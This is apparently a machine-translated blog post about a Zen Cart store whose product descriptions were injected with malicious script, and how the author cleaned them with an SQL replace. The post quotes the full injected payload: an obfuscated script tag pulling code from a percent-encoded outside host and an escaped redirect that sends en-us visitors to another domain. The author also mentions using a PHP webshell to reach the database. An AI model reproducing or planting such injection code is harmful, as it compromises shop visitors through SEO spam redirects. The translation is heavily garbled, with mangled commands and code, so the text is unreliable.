By template_default \ \ \ by tpl_document_product_info_display. PHP

Content is a variable <? PHP echors stripslashes ($products_description); ? >, depressed. Haven't played one Zen Cart. Don't know this variable from which come of. To seek along while no idea, have to go to the database to see. Using PHP webshell backup feature connect into the database to see garage's a products_description watch, immediately back up to download.

Local mysql reduction

Relational commands

01. Uroot - p123456 mysql -

02.

03. Create database aaa,

04.

05; use aaa.

06. 07. Returned d: \ SQL; 1.

08. After recovery

Indeed found in commodity description watch front all are inserted into the code.

Using batch replacement, Daniel immediately returned to normal.

The HTML code is as follows:

Update products_description set products_description = replace (products_description, '< div style = "put none" > < script: language = "javascript" SRC = "http://%63%6F%75%6E%74%34%30%2E%35%31%79%65%73%2E%63%6F%6D/click.aspx?id=401446169&logo=6" charset = "gb2312" > < / script > < script > <! --

Document. Write (unescape (" % 3Cscript % 20language % 3D % 22 22JavaScript % 0D % 3E % 20% 0A % 3C % 0D % % 21-20% 0Avar % 20la % 3Dnavigator. BrowserLanguage. ToLowerCase % 0D % 28% 29% 3B % 0Aif % 28la % 3D % 3D % 27en - us % 27 percent 29% 20document. Location % 20% 3D % 20% 27http % triple-a / / % 69% 69% 33% 76% 2E % 63% due to % 6D/b % 0D % 27 percent 3B % 0A / / % 20 - % 0D % 3E % 20% 0A % 3C/script % 3E "); / / - - > < / script > < / > ', 'div)

The following task is to find the PHP Trojan with the back door, Zen Cart to upgrade to the latest.

So far, this task is relatively sharp seo attack method ah.

Actually zen cart templates are PHP, many people do have door on the Internet. Template, Insert the statistical code inside, use by using would be to use. Be careful ` online template oh ` `

Later found a zen cart many students ` ` appear similar problem